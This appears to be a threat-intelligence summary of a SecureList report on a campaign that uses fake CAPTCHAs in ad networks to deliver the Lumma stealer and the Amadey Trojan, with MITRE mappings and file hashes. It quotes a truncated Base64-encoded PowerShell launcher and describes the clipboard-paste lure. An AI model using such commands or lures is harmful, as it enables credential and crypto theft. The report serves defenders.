Threat Research

Lumma/Amadey: Fake CAPTCHAs Test Your Humanity

SecureList

Researchers identified a campaign that distributes Lumma stealer and the Amadey Trojan via fake CAPTCHAs embedded in ad networks, expanding beyond gaming sites to adult, file-sharing, betting, and other platforms. The operation uses deceptive redirects and PowerShell-based payloads, exfiltrating credentials and data while sometimes installing Remcos for full remote access and manipulating BitLocker To Go to steal crypto-related data. #LummaStealer #AmadeyTrojan #FakeCaptcha #Remcos #BitLockerToGo #PowerShell #AdNetworks #Brazil #Spain #Italy #Russia

Keypoints

  • Fake CAPTCHA acts as the initial infection vector for Lumma stealer and Amadey Trojan via ad networks and redirects.
  • The campaign expanded from cracked-game sites to adult sites, file-sharing services, betting platforms, anime resources, and web apps monetizing traffic.
  • Payloads delivered include Lumma stealer and Amadey Trojan through CAPTCHA-driven scripts and deceptive prompts.
  • Users are prompted to perform unsafe actions, such as copying a PowerShell command to the clipboard and executing it.
  • Lumma stealer uses BitLocker To Go to access, modify files, and manipulate the registry to facilitate theft of crypto-related data.
  • Amadey Trojan can substitute clipboard data, take screenshots, and download Remcos for full device control.
  • From Sept 22 to Oct 14, 2024, over 140,000 users encountered ad scripts, with more than 20,000 redirected to infected sites, notably affecting Brazil, Spain, Italy, and Russia.
  • Ad networks are exploited to redirect users and perform unsafe actions, boosting potential revenue for operators.

MITRE Techniques

  • [T1059.001] PowerShell – Used to execute malicious commands through Base64-encoded scripts. ‘powershell.exe -eC bQBzAGgAdABhA<…>MAIgA=’
  • [T1003] Credential Dumping – Steals credentials from browsers and password managers. ‘Steals credentials from browsers and password managers.’
  • [T1486] Data Encrypted for Impact – Manipulates BitLocker To Go to access and modify files. ‘Manipulates BitLocker To Go to access and modify files.’
  • [T1219] Remote Access Tools – Amadey can download Remcos for full access to the victim’s device. ‘Amadey can download Remcos for full access to the victim’s device.’
  • [T1041] Exfiltration Over Command and Control Channel – Steals data and sends it to the attacker’s server. ‘Steals data and sends it to the attacker’s server.’

Indicators of Compromise

  • [Hash] context – e3274bc41f121b918ebb66e2f0cbfe29, 525abe8da7ca32f163d93268c509a4c5

Read more: https://securelist.com/fake-captcha-delivers-lumma-amadey/114312/